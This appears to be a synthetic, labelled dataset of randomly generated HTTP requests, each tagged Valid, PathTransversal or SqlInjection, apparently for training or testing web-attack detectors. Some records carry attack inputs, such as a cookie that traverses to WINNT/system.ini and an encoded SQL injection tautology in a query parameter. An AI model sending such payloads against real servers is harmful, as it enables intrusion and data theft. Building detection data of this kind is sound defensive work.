If-Modified-Since: Tue, 15 Jul 08 16:19:35 GMT
If-Unmodified-Since: Sat, 28 Aug 04 11:55:23 GMT
If-Match: "fuG7tJANn4WAD@i"
If-None-Match: *
If-Range: *
Max-Forwards: 828
MIME-Version: 7.7
Pragma: no-cache
Proxy-Authorization: NTLM ZG5lYW1sb25pb0s4cnJUdW5vVG5UdGlvc2V0dGFOdEZ6
Authorization: Basic dWFvbjppOGJlaG5Nbg==
Range: -742
Referer: /5geu/nlsole/dp39swO/eoRyeaAA.bin
TE: deflate;q=0.2,chunked,chunked
Trailer: If-Range
User-Agent: icljqen (sGVXWZFu; ekRDMu)
UA-CPU: Sparc
UA-Disp: 2455,8800,8
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 3851x1864
Via: 3.0 103.49.41.209:0, 1.4 91.153.253.199, 7Enuzi/0.1 www.d1nm.js
Transfer-Encoding: rrlol; ynjeer=j1A5h
Upgrade: deie/0.6, rtumhr/9.8
Warning: 366 www.utrawot.html "Enahhagtdtdshfheg" "Wed, 29 Nov 06 11:34:27 CET"
X-Forwarded-For: 29.49.155.233
X-Serial-Number: 194126085
----: ----------------------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 12943
Start - Id: 11504
class: Valid
GET /s0t8ZkP.Qw/eVdK.shtml?hNhtaccesCstyle-N=riwaid&nmoaaoi=oc%2BBhhiexecolSb HTTP/1.1
Host: www.reestjntn.com:80
Connection: keep-alive
Accept: text/html, application/postscript;q=0.4, text/*;q=0.4
Accept-Charset: *
Accept-Encoding: deflate;q=0.0, identity, deflate;q=0.0, gzip
Accept-Language: 9yh-lir;q=0.9
Cache-Control: edb7m7=ng
Client-ip: 143.74.153.44
Cookie: QdeleteZjVorcpvDpr=z a
Cookie2: $Version="655"
Date: Mon, 28 Jul 08 24:27:33 CET
ETag: "eRs7eN2ThLH.jMlTHj"
Expect: 100-continue
From: qe3py@vamlOelgas.uk
If-Modified-Since: Sat, 24 Sep 05 20:44:38 GMT
If-Unmodified-Since: Sat, 17 Apr 10 21:55:36 GMT
If-Match: *
If-None-Match: *
If-Range: "Wud6CmAoz-b0YuPQ."
Max-Forwards: 9704
MIME-Version: 7.9
Pragma: un3cla=he
Proxy-Authorization: Basic c0V0NDpzb2Zy
Authorization: NTLM aDI1M1JudHZlVVNlbkFsa2RsZWNyaWJudGZveWVhMG8wZ2k=
Range: 56-,-65806,-691
Referer: http://www.nnwudpo.it/iiro/Ee7mdy.gif
TE: trailers,trailers
Trailer: Proxy-Authorization
User-Agent: 06uar (lx3TDaS_; lt6Ju84r)
UA-CPU: 68000
UA-Disp: 9055,045,32
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 9366x217
Via: HTTP/4.2 245.42.164.25:973, HTTP/4.9 www.sd53.css
Transfer-Encoding: identity
Upgrade: rno3h/9.6
Warning: 090 68.2.195.170:1 "ene5ebeNyr34uhehmh" "Sun, 10 Jun 07 01:27:55 CET"
X-Forwarded-For: 0.47.132.31
X-Serial-Number: 549071549
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 11504
Start - Id: 6437
class: Valid
PUT /mlbtoletIhrleWlp/5Kr1uetc2LENRL/SmetaQHdrshutdownY.php? HTTP/1.0
Content-Length: 83
Content-Language: fMS,ml,vat
Content-Encoding: gzip
Content-Location: http://www.28eri.cz/bric/oadT/soczdU/lta75boE.php
Content-MD5: dGdvdGRvblIxZWFhbXRhNA==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 09 Apr 08 16:14:17 CET
Last-Modified: Fri, 24 Jun 05 05:58:41 CET
Host: www.md3nSdes.gov
Connection: keep-alive
Accept: */*
Accept-Charset: macintosh, windows-1255;q=0.4
Accept-Encoding: compress, deflate, deflate, compress;q=0.0, compress
Accept-Language: cf-mguOtlw, 5-s
Cache-Control: max-age=21
Client-ip: 55.51.76.93
Cookie: rdRiibhr97htlz=oxwz5-76n;ntedwsc=sYcipp2Lqiv;I-Fu@oiDy=dtD__FlEzsbH;iybterrrl5drcmb=nris;nlwiioecZdq=76;lbodb=ua
Cookie2: $Version="7"
Date: Wed, 24 Oct 07 04:26:39 GMT
ETag: "TtF9Siccu.hPdDQeo"
Expect: i3mede
From: 5onfgr@tttceuz.gov
If-Modified-Since: Sun, 18 Oct 09 03:13:39 UTC
If-Unmodified-Since: Wed, 15 Oct 08 15:13:13 UTC
If-Match: *
If-None-Match: "EJ1fSPWj4vA4e-ZPX"
If-Range: Sat, 16 May 09 03:37:21 GMT
Max-Forwards: 6074
MIME-Version: 5.7
Pragma: 0eax4osx=hosp
Proxy-Authorization: NTLM Y0FkaGNkZWV1YzN2YWx0ZWp0cHNsR2xPYVlhQTY2c3dlcGhhblJ0Z2tzZ2lhY2E=
Authorization: Basic T2Rkcm5lOm5pU2hvZlRz
Range: 20995-3,994884-5,-38008
Referer: http://www.oaawfdt.it/OdvlAos.bin
TE: deflate
Trailer: Accept
User-Agent: EeT6E (z-0b6tXRO; pNbaEE0)
UA-CPU: 68000
UA-Disp: 0332,310,8
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 8174x6805
Via: 7.0 www.cnho0c.png, 9.0 255.135.180.38
Transfer-Encoding: identity
Upgrade: roeode/1.5, t4s/4.1, soug/6.1, 4eicou/3.7, tmcaor/3.0
Warning: 834 www.myeibl.html "tfAmnsglsree" 
X-Forwarded-For: 3.49.116.125
X-Serial-Number: 45754151629
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~

heth=%n)%u&tnlNmutr9=ftpt9g+ eosaweael&blbdwtrurhUk=httpnrdt&howyc=\apnnh

End - Id: 6437
Start - Id: 36195
class: PathTransversal
PUT /hnni/5I8/pouysrg3bwy/tLk/saqZJbyVM0@/0shuaccm2t/HyirIird28P8/h1@/ni96tahoaa6os0szsd/J0DA7rk6atB6/WPnl01qossg1rpwt0net.bin? HTTP/1.1
Content-Length: 169
Content-Language: wLltea
Content-Encoding: compress
Content-Location: /nraFS8/2ugza5de.txt
Content-MD5: b05hZ205dG9uZDlnaGV0Tg==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 25 Jan 04 05:41:27 UTC
Host: 223.100.113.81
Connection: usdr8ln
Accept: */*
Accept-Charset: *;q=0.6
Accept-Encoding: gzip, identity, identity
Accept-Language: *;q=0.0
Cache-Control: max-stale=5
Client-ip: 179.44.14.163
Cookie: sT0nIert6ofa=drbrij1aZiC5;QrN3m.accept=oXB7;eicpcIrxitsh=..........................WINNTsystem.ini;.EaI=;
Cookie2: $Version="355"
Date: Fri, 06 Feb 09 16:57:20 UTC
Expect: sme2eto
From: anzor8q@srmi.net
If-Unmodified-Since: Fri, 05 Mar 10 15:23:04 CET
If-Match: "WKz1WkyI5lMobWcC37"
If-None-Match: "R6PS3xoWRBz08HdAgU"
If-Range: *
Max-Forwards: 3
MIME-Version: 1.6
Pragma: Q='aihNki'
Authorization: Basic YzFGaHNyOjdzZDJpZA==
Referer: /iaNnN.tiff
TE: deflate,chunked;q=0.5,deflate;q=0.0
User-Agent: Mozilla/7.4 (Windows; U; Win 9x 0.4; PB-en; rv:0.0.4) Gecko/99837193
UA-Disp: 6799,4667,8
UA-Pixels: 595x428
Via: 3.3 www.lajhwn5.gif:4
Transfer-Encoding: compress

gsjfvw=p&tehskbero61a=ou0a&heus0lo=o6heay1ldEpositiona% &soht=2eqcSctyzhejroac&esiankfoynrx=f5i&we3as=tQ9-iwVyvKq&ffbjSRxatgfet=t|al2&eursoR7wqstcct=xu.py8af&tooWb=1

End - Id: 36195
Start - Id: 42349
class: SqlInjection
GET /F8n_xt_cb/Nlnggotm/b-YEWw_RC/aO0iGMlUo7CMAQp/gf/fieatdn2Ys8fUnwenme.msf?norao3mnMlb6=206&uRtnode_BdivS8MvA=pwdSVYE&iaSj8-K=hPrt+e&erevesmoau=8&8bo=dASKIMBIJHTH&rm=%3Ao&ab=nwg&aNKTmC=7cIeackscg&fsncvtnk=f+al&Do3toNsske=%27+++++%2F**%2F++OR+++++%2F**%2F%27%27%3D++++%27&bLusrE=atcYu_jt&eacg=3864902554 HTTP/1.1
Host: 24.153.199.43
Connection: close
Accept: image/*, audio/*, audio/basic;q=0.8
Accept-Charset: windows-1257, windows-1251, iso-8859-8-i, euc-kr;q=0.9
Accept-Encoding: 
Accept-Language: *;q=0.5
Cache-Control: no-store
Client-ip: 106.173.49.114
Cookie: Iol=1W24U_abq-q4;m8a=iTQxbYUmQup;Lace=921667
Cookie2: $Version="85"
Date: Wed, 26 Jan 05 18:59:14 GMT
ETag: "OVVBmY_Rb3C9MGri_gO"
Expect: hoioeia=Artttt;msuR6sft=Rec7diI
From: 9quNt@ct6Iewpcw4.cz
If-Modified-Since: Thu, 19 Apr 07 23:00:35 UTC
If-Unmodified-Since: Fri, 18 Jun 04 09:17:23 UTC
If-Match: *
If-None-Match: *
If-Range: Sat, 19 Apr 08 21:50:25 GMT
Max-Forwards: 29
MIME-Version: 5.2
Pragma: nll3nb=p1o
Proxy-Authorization: Basic aGlzbGlvZTpyRVU0c3IwMQ==
Authorization: Basic cXJlcjp3czBzYw==
Range: -42018,-510767
Referer: /0ete.php3
TE: gzip;q=0.8,trailers
Trailer: Proxy-Authorization
User-Agent: RtmngisEhbo
UA-CPU: PowerPC
UA-Disp: 695,8049,32
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 999x243
Via: 2.1 www.edhi2y.css
Transfer-Encoding: compress
Upgrade: aia9y/5.8, shfr/4.4, ssoa/6.4
Warning: 478 44.68.67.163:8 "haHdehmpgh" 
X-Forwarded-For: 171.143.1.2
X-Serial-Number: 71261
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 42349
Start - Id: 33141
class: Valid
POST /sD-En.nsf? HTTP/1.1
Content-Length: 168
Content-Language: seMdeT,tSeoen,alut9dkg
Content-Encoding: gzip
Content-Location: /erSa/tprl/eaHTi.zip
Content-MD5: aGFzcjhpYk5rWGRydHJFdg==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 01 Jul 09 08:40:17 GMT
Last-Modified: Sat, 28 Oct 06 18:40:58 CET
Host: 126.218.40.162:5
Connection: close
Accept: */*;q=0.2
Accept-Charset: gb2312
Accept-Encoding: *
Accept-Language: cmhgy3vs-noofck;q=0.5
Cache-Control: osokikl=tna8
Client-ip: 156.100.161.187
Cookie: noiomsip=hef;Ot9aehgme=3215860;D_by=419379501;w2=5;BApHfromI=ed
Cookie2: $Version="653"
Date: Mon, 21 Aug 06 19:29:19 CET
ETag: "CIYpvMZBh6R6qvtRRp"
Expect: 100-continue
From: da5Aamnq@DilRnio.gov
If-Modified-Since: Sun, 16 Jul 06 11:10:06 GMT
If-Unmodified-Since: Tue, 09 Jun 09 03:57:53 GMT
If-Match: "U3IZYxHpJFoHa27H5"
If-None-Match: *
If-Range: *
Max-Forwards: 2
MIME-Version: 6.2
Pragma: hubnenht='1nrabsfu'
Proxy-Authorization: Digest uri=/EsalneHn/dnt3tE/TaleA/I69rtf/t3aeua.php3
Authorization: aSlz ned2=tsclenc
Range: 2283-08,769-296466,942-
Referer: /i8tarse/scia/oeAysFI/znS2n2N/ontAbt.jsp
TE: gzip
Trailer: Authorization
User-Agent: Mozilla/0.0 (Machintosh; U; PPC Mac OS X 4.1; A2-tb; rv:7.6.8) Gecko/54164919
UA-CPU: MIPS
UA-Disp: 888,820,16
UA-OS: Win95
UA-Color: color16
UA-Pixels: 6581x441
Via: 3.9 120.155.48.132
Transfer-Encoding: identity
Upgrade: ovT/9.9, reD/3.1, eel/0.6, oeey/7.8, u2uyl/8.8
Warning: 541 www.lrooltb.jpg "eaO7ssg4nbeu" 
X-Forwarded-For: 92.19.31.36
X-Serial-Number: 0421946796861302632
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

msaEse=474035220&vcGVhtacces2Wphpz=enbd&ywtti=g&G2moeS5mNLu=988&OstotfnHhJ=cecqqpBnk&tslicnO=8019&uolaasspnyut=go6=&niaiht=61994&BhaRYg0U=uservicestmpe-htaccesro1eT-n

End - Id: 33141
Start - Id: 34680
class: Valid
POST /ytIlue/oL-W/RtEKC56WuhdrOY/yinpDhztkeorlMk24/sD5g/s9hRD1.tiff? HTTP/1.0
Content-Length: 16
Content-Language: tUte,54b,Xto2ttMg
Content-Encoding: deflate
Content-Location: /snoen/gAul.avi
Content-MD5: b2VyaWJobXVhOEJwbnZvaA==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 20 Sep 04 24:58:32 UTC
Last-Modified: Wed, 07 Jan 04 10:16:30 UTC
Host: 30.225.123.108
Connection: close
Accept: image/gif
Accept-Charset: *
Accept-Encoding: *
Accept-Language: R-Ihxe0, eu-t;q=0.3, Nlen62ae-nphtae;q=0.9
Cache-Control: no-store
Client-ip: 138.28.225.214
Cookie: atfd8J8wopwv5=808811
Cookie2: $Version="77"
Date: Thu, 01 Sep 05 13:20:45 CET
ETag: "-z7cDaqJyeTCA5bCl"
Expect: 100-continue
From: lmeur@Eanea.ch
If-Modified-Since: Mon, 19 Mar 07 15:28:37 CET
If-Unmodified-Since: Sun, 06 Aug 06 23:53:31 CET
If-Match: *
If-None-Match: "msnWd46t1oVbH-jRZuj"
If-Range: "T0tMgZQxvOyDfKoVfFa-"
Max-Forwards: 8935
MIME-Version: 6.7
Pragma: diiuama=aesi
Proxy-Authorization: NTLM TmlpbHlyMWNpY3dwb2NiZmtHb2kxZWJpY2V0bW90ZGRpaWFyaGhicm9l
Authorization: Basic cm5lZmE6MXRlZUVM
Range: -08
Referer: http://pidm.uk/6tee.msf
TE: trailers,deflate
Trailer: Warning
User-Agent: Mozilla/2.3 (Machintosh; U; PPC Mac OS X 5.4; te-wl; rv:8.2.4) Gecko/29506288
UA-CPU: MIPS
UA-Disp: 081,3578,16
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 0894x8053
Via: 6.3 www.cn4nEs.gif, HTTP/4.9 41.64.182.83
Transfer-Encoding: gzip
Upgrade: nq8o/9.4, hsea/1.7
Warning: 912 www.vEtlJzei.png "hmbt4d6C" "Tue, 20 Sep 05 24:39:51 GMT"
X-Forwarded-For: 180.150.65.176
X-Serial-Number: 30358
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

eektesuc=5583877

End - Id: 34680
Start - Id: 15857
class: Valid
GET /oaL4MjuciA6/a-D/mjfarsu0wgceEunaoexc/eptoI/sT9T2udelete5mI/boot.inixtermselectIq1Bt/ktssizipuc3v/eferd8ehttteahise/ndsrghs.bin?3uA5qw=9r+s&dn=imgrrsMsuSHxOn&ooR=tYdacceptisNpasswd2etntMnadsinclude&so=0qi&dcdE567=h&ct=shutdown%3Ao0awp-n-%29gtolsursock_stream+of2&uIrTctpTm=le&fn=nteupdate-ua&g2e=jnestiieaiEhrcicco&mtStNn=12Lbc7bL8U&8thitii8e6=ijt&ehuair7de=211868&Eiewssbt=oj%3B9 HTTP/1.1
Host: 158.62.183.120:80
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.6
Accept-Encoding: 
Accept-Language: iwwn-esrnrs;q=0.0, cn-9, lEjC-fo0;q=0.9
Cache-Control: max-age=596
Client-ip: 127.204.91.129
Cookie: Ld=dLS_Jw;urnKsdKhaeynes=aGd@ioC@;5sice8=14206613;eherziieacuK=edr;sgse9=o;gdattYp=e7mQ2J1
Cookie2: $Version="648"
Date: Sun, 12 Mar 06 22:11:16 UTC
ETag: "sRMVRB@fe0X3XWjmg9X"
Expect: 100-continue
From: ddet@hbn6tgsa.be
If-Modified-Since: Mon, 12 Jul 04 06:44:01 GMT
If-Unmodified-Since: Wed, 27 Dec 06 23:50:12 CET
If-Match: *
If-None-Match: *
If-Range: Sun, 18 Feb 07 22:34:30 GMT
Max-Forwards: 02
MIME-Version: 3.5
Pragma: no-cache
Proxy-Authorization: Basic bWRydTp4ZWRtb25n
Authorization: easry went=5g2uu
Range: -630,9-,363-
Referer: http://euddrhon.cz/ehpeQE/p2eUin/f6taa/eTtqano.html
TE: trailers,trailers
Trailer: If-Unmodified-Since
User-Agent: vscnou8uoweet
UA-CPU: MIPS
UA-Disp: 318,100,8
UA-OS: Win95
UA-Color: color32
UA-Pixels: 7576x5405
Via: HTTP/0.6 112.129.103.170:419
Transfer-Encoding: compress
Upgrade: 1eae/0.8, q1he/7.5, itp/8.5, entee/9.7, Eq78/3.4
Warning: 604 81.185.163.141 "ieibl8a" 
X-Forwarded-For: 27.123.98.19
X-Serial-Number: 6066558353005235
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 15857
Start - Id: 21589
class: Valid
GET /oLObDWAA3hZ/unionSwindow.open5Kon_q.html? HTTP/1.0
Host: www.t3an.com
Connection: keep-alive
Accept: text/*, text/*, text/xml;q=0.6
Accept-Charset: windows-874, koi8;q=0.6, windows-1251
Accept-Encoding: identity, deflate
Accept-Language: *
Cache-Control: no-cache
Client-ip: 14.192.39.170
Cookie: ojnte3smhoisa=hAp56mrTet9cytmiHl;mre=gatpsi
Cookie2: $Version="719"
Date: Mon, 12 Jan 09 16:41:39 CET
ETag: "HbDOE4mELUlA4X1_S"
Expect: eIxaen4e=2auh;bWPne7g
From: octEhy@eenoS.org
If-Modified-Since: Wed, 17 Feb 10 08:55:31 UTC
If-Unmodified-Since: Sat, 10 Jan 09 09:45:04 UTC
If-Match: "TEBOnkLOaBZlKryita_d"
If-None-Match: *
If-Range: "j5CQt.Nv6POBhHK9"
Max-Forwards: 38
MIME-Version: 2.8
Pragma: s='sna8raed'
Proxy-Authorization: Digest nc=69Fc9563
Authorization: Digest algorithm=MD5
Range: 2-,639-89,039-12407
Referer: /deilEk/eojl.pl
TE: trailers,deflate,trailers
Trailer: Accept-Encoding
User-Agent: 4RAnf (jI9FkDtucP; tC-bwnB; sWY_dvPL)
UA-CPU: x86
UA-Disp: 198,1596,32
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 1645x752
Via: htnho/9.2 www.9eys.tiff:4, HTTP/3.7 100.23.86.16:98479
Transfer-Encoding: gzip
Upgrade: blnen/8.7
Warning: 454 253.133.69.76 "ooerIseMeAi7r9coias" "Sat, 14 Oct 06 08:48:24 UTC"
X-Forwarded-For: 99.21.116.3
X-Serial-Number: 0418048557333038
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 21589
Start - Id: 19082
class: Valid
GET /Ussutfkc/osipK_3EPOPEQxpeTa.asp?zbD8daEcLP_h=0&ituRitW=insert%29&tthi=%7E+&gber=edfeadr9t3bea&4L2arwht9eim=fY3Yhw&cht=64&lhcinr=childsSahnmceldiv%5D8te HTTP/1.1
Host: www.sznahuh.gov
Connection: close
Accept: */*;q=0.9
Accept-Charset: iso-2022-kr;q=0.1, windows-1251, cp-950, euc-kr;q=0.6
Accept-Encoding: *
Accept-Language: *;q=0.6
Cache-Control: max-stale=5862
Client-ip: 222.183.198.147
Cookie: oesdtyr=5882445;EsmcoAuslod4cH=t.nhz0SL
Cookie2: $Version="843"
Date: Tue, 07 Oct 08 07:07:35 UTC
ETag: W/"ybTiqqPUXJhv01KIDA9"
Expect: o1athi=doihD;aron=gyst
From: jgqen@7tosiu.st
If-Modified-Since: Tue, 16 Jun 09 14:39:26 GMT
If-Unmodified-Since: Wed, 12 Jan 05 01:54:20 GMT
If-Match: *
If-None-Match: *
If-Range: Wed, 29 Jun 05 06:57:18 UTC
Max-Forwards: 6
MIME-Version: 1.4
Pragma: no-cache
Proxy-Authorization: NTLM NHBwdDFldGVlaXQxbm1nb3J0SXRobnlubnRyczV0ckFobmhlYQ==
Authorization: scih flee=eaareie
Range: -98,0008-41,92-
Referer: http://www.ztMav.cz/ohstacwx/sng8p/7elboaq/enei/r0dertsg.conf
TE: trailers,deflate
Trailer: Accept-Language
User-Agent: TidSrsAchn7
UA-CPU: PowerPC
UA-Disp: 603,8155,16
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 019x039
Via: HTTP/1.9 www.hpaNuub.gif, 2.1 102.122.7.12, n3edzr/2.4 88.74.187.240
Transfer-Encoding: enTnsG
Upgrade: mTec5/5.9, iRo/8.2, 5e5e/7.4
Warning: 769 www.ynfoTewU.png "tyneuSih9ho" 
X-Forwarded-For: 203.182.207.188
X-Serial-Number: 594077
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 19082
Start - Id: 22408
class: Valid
GET /OeN/b.aM9czkRn/orcsSvmc.jpg?teo=p0xo2&l2gyQnrnt=+aaothlroy&eokhath=opensxtermve&gSJ5smxjFxo=20&Nezferp=u05LeqtNsmiNoAnka HTTP/1.1
Host: www.tfel1ia.gov
Connection: ccgr2e8
Accept: */*;q=0.9
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *
Cache-Control: min-fresh=733
Client-ip: 102.187.24.158
Cookie: oearaen=12242;clohXr2oat=880254
Cookie2: $Version="7"
Date: Fri, 30 Jul 04 19:24:35 CET
ETag: "i8DWFxnOiHIA0GwWJQXT"
Expect: 100-continue
From: osurT@isn3pers.uk
If-Modified-Since: Wed, 03 Sep 08 01:10:16 CET
If-Unmodified-Since: Tue, 16 Nov 04 12:27:21 CET
If-Match: "PxqPkxW8mya1HhMpHEV"
If-None-Match: "SlYxF6Yfz2yoVDw7"
If-Range: Sun, 08 May 05 23:06:26 UTC
Max-Forwards: 0557
MIME-Version: 0.8
Pragma: hs='tte'
Proxy-Authorization: NTLM c3NlOG5yZU50bWVIeWxuaWx4NWlldWFvaTFxZW5sYjZhVHI=
Authorization: Digest nonce
Range: 6241-,-19542
Referer: http://www.zI5a.it/ahs6enhz/mte9fi/heeexBm/ezrpt/oel7oe.mpeg
TE: chunked,trailers,chunked
Trailer: Authorization
User-Agent: lhsr (nUpwCCUs; sLv3lx-)
UA-CPU: x86
UA-Disp: 1777,9655,16
UA-OS: Win98
UA-Color: color16
UA-Pixels: 112x1566
Via: 0.2 www.fvTehxe.htm
Transfer-Encoding: semre; rrroxoc=sofhed3s
Upgrade: ioit8a/2.3, ldiu/6.1, uEu/1.0, AH6/0.7
Warning: 245 169.86.241.14 "nhn9hhnhuaifml" "Sat, 17 Oct 09 10:05:26 CET"
X-Forwarded-For: 112.96.205.75
X-Serial-Number: 935727491848892765
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 22408
Start - Id: 11980
class: Valid
GET /q0by7KndssdtEs9arOdE/cr6Annhvf6/emetaD11/towaraJnhhai5ots/sdgjcY0rTRt/ljryaYPWDn@c_-@/HJJpassthru5U1zhomev.png? HTTP/1.1
Host: 162.247.175.250
Connection: keep-alive
Accept: image/*;q=0.3, image/*, audio/*;q=0.4
Accept-Charset: *;q=0.4
Accept-Encoding: *;q=0.7
Accept-Language: *
Cache-Control: min-fresh=1
Client-ip: 227.21.129.166
Cookie: oilneeu=11315251;anor5Ye0gD4rwc=z;tetcehf6ieamu=lsn;tnnuruirtpekr=14;ygmd=suKL7o-ntx;e1tezsnsdnBEn0o=nl1i
Cookie2: $Version="2"
Date: Wed, 03 Mar 10 11:08:01 UTC
ETag: "ja7JX40J4YiRO32m"
Expect: 100-continue
From: heeltin@ed0ee3i7c.fr
If-Modified-Since: Thu, 21 Dec 06 02:13:44 UTC
If-Unmodified-Since: Mon, 26 Sep 05 24:23:03 CET
If-Match: *
If-None-Match: *
If-Range: Sun, 12 Aug 07 09:52:02 UTC
Max-Forwards: 135
MIME-Version: 3.7
Pragma: lto=n
Proxy-Authorization: Basic bnRlaTpFcjBiY2k=
Authorization: uviq oqbaptww=h2ha
Range: 9-,78403-
Referer: /rOjOya/t2ktrae.cfm
TE: gzip,gzip;q=0.9
Trailer: User-Agent
User-Agent: Mozilla/2.8 (X11; U; Open BSD i386 4.6; yt-ot; rv:0.0.1) Gecko/29395595
UA-CPU: MIPS
UA-Disp: 833,846,32
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 630x5808
Via: tooRs/9.1 89.79.20.2:7029, FTP/2.2 www.oieMetmi.shtml:0, 4.1 79.117.202.209
Transfer-Encoding: compress
Upgrade: ia1c/2.8, mur/1.2, susnSi/2.8, tteid/2.7, nnese/5.9
Warning: 062 www.uhaba3n.jpg:624 "jrE8wfEoytuir6bfae3o" "Tue, 24 Jan 06 06:41:06 CET"
X-Forwarded-For: 239.127.131.42
X-Serial-Number: 670096035438562
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 11980
Start - Id: 34327
class: Valid
PUT /aTwzyeR1/olt40r/xEfE-QOQ_Uy/ejmyVxBtm1B62nkPmBPC/km-PWG0iAx759G1/uerKm1qD4d9UGJ/Mu4qaDah2oridnrepg/dkoB-1A4-vjh@Cz/sattinDSls5nab/eLQ1Vz7DlLq0SCXSFQXS.nsf? HTTP/1.0
Content-Length: 184
Content-Language: 7fie,dlgepj
Content-Encoding: gzip
Content-Location: /jhpou9g/Htinght/hhnaryst/Nhiebnfi/cgita.asp
Content-MD5: amlyZHMwdW90dzVubmo4NA==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 01 May 10 16:49:44 GMT
Last-Modified: Sun, 01 Feb 04 13:29:33 CET
Host: www.edfliot9.com:1484
Connection: close
Accept: video/quicktime, application/x-tar;q=0.4, text/xml
Accept-Charset: x-mac-roman
Accept-Encoding: *;q=0.2
Accept-Language: *;q=0.8
Cache-Control: no-transform
Client-ip: 116.18.167.222
Cookie: sok4nef=hBytLKd1iv;ksavnhinrm=Ucot|1e;DS@gMuj=naRzn;amscgbrMOolHen=018
Cookie2: $Version="03"
Date: Wed, 08 Mar 06 10:54:19 UTC
ETag: "6.GGInPxVWRFj_JOYH"
Expect: 100-continue
From: viamr6@yergvcA.biz
If-Modified-Since: Fri, 09 May 08 24:59:48 UTC
If-Unmodified-Since: Fri, 06 May 05 20:02:22 UTC
If-Match: *
If-None-Match: "5BCwEOWsOvze-JB"
If-Range: Fri, 09 Mar 07 12:06:55 GMT
Max-Forwards: 780
MIME-Version: 5.5
Pragma: r=l
Proxy-Authorization: NTLM aU9yd2hldW1uZ3RycnFtdUhqZUE0b3U5cmVzdGJyc3RhZTFnYWk1bnZveWVMbQ==
Authorization: NTLM dDBvaXV0aWVlYTNjYW5hQW16ZWFiZUdwYW9sZGVic2xtaGI3M2l6ZWF1
Range: -92864
Referer: /szdi.tar
TE: deflate;q=0.7,trailers
Trailer: Upgrade
User-Agent: Mozilla/8.4 (compatible; irwoIealt; WinNT; Dtaaktupt; rfvgrilc; eues)
UA-CPU: Sparc
UA-Disp: 693,674,16
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 9714x0556
Via: 9.7 www.Bdyeer.html, 3.6 71.123.107.41, 7.3 www.s7oi9F.css
Transfer-Encoding: identity
Upgrade: lOrae/2.3, unerfn/4.1, roft/4.9
Warning: 720 www.Aeesaq.jpg "emdinlt5scc" "Tue, 21 Sep 04 09:33:30 CET"
X-Forwarded-For: 143.200.9.7
X-Serial-Number: 57690312658
----: -----------------
~~~~~: ~~~~~~~~~~~~~

0aIifg=e a&a7a9heAwV=ed&vonhh=so3hpPedJ&lael5xbtq8ie=546&sLieer5=aIx&ribozNUert=vssis4ksynn&ftod2=73&pNmsxw9esaefi=454&uenqc7pyG=emlnvdeleteO9=aeslortidv$d&bgsoundzUa7e9=0denosi0Is

End - Id: 34327
Start - Id: 3476
class: Valid
GET /h1D8Rx1UvSngBt/JmXoA/tc/yTGGkobZdZPD/fz3aekj8QXxueoNmH/cE5cBGCmO@3rZbL3_/ecdsrl2oervdenksAetj/iBH6a.7/leoyeiewmsts/tPZEVE8ZefY5IFHX1/d8wlEoslyrnEy/GcIhxrhtec8bi.exe?WyCRTY=ksins&noJogt=62447970&upne=wlhynd%3DdiseEtudHsl&nso=42088521&zyeP=zhAtu&7sthpopSTer=t HTTP/1.1
Host: www.u01wkltda.it
Connection: close
Accept: application/*
Accept-Charset: utf-8, windows-1258;q=0.2
Accept-Encoding: 
Accept-Language: hanuos0-htnot;q=0.0
Cache-Control: max-age=06
Client-ip: 130.124.38.104
Cookie: p3NBztmpMmWA=4189;8WkNcQF=n7rjraodb6p;ryin=einputNve
Cookie2: $Version="918"
Date: Fri, 10 Nov 06 18:33:55 GMT
ETag: "CidmwIKeWdW046P"
Expect: lNat8p=Rdnrtq;wpydr=teBriA1
From: peuneie@adoc.be
If-Modified-Since: Thu, 07 Dec 06 20:15:08 UTC
If-Unmodified-Since: Sat, 01 Nov 08 04:15:14 UTC
If-Match: *
If-None-Match: "SBHZO7fx_x2tj_i"
If-Range: Fri, 03 Nov 06 23:46:50 CET
Max-Forwards: 278
MIME-Version: 8.0
Pragma: Deti=nmurrsu
Proxy-Authorization: Digest algorithm=MD5
Authorization: Basic cnFhbm5udDpoYmtzdlhj
Range: -535,169-
Referer: /lnve/Bmno/zlmr7iut/ujvi/9gSr.html
TE: gzip,chunked;q=0.9
Trailer: User-Agent
User-Agent: 1mupsdnnsD
UA-CPU: x86
UA-Disp: 086,5443,16
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 8177x498
Via: 8.8 www.sce6.tiff, 1.9 www.8rUn.shtml, 7.5 www.sjhslo.tiff
Transfer-Encoding: identity
Upgrade: 7rc5/0.0
Warning: 863 159.181.120.223 "xOoQlietttieaioild" 
X-Forwarded-For: 175.189.142.174
X-Serial-Number: 699471277018
----: --------------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 3476
Start - Id: 32352
class: Valid
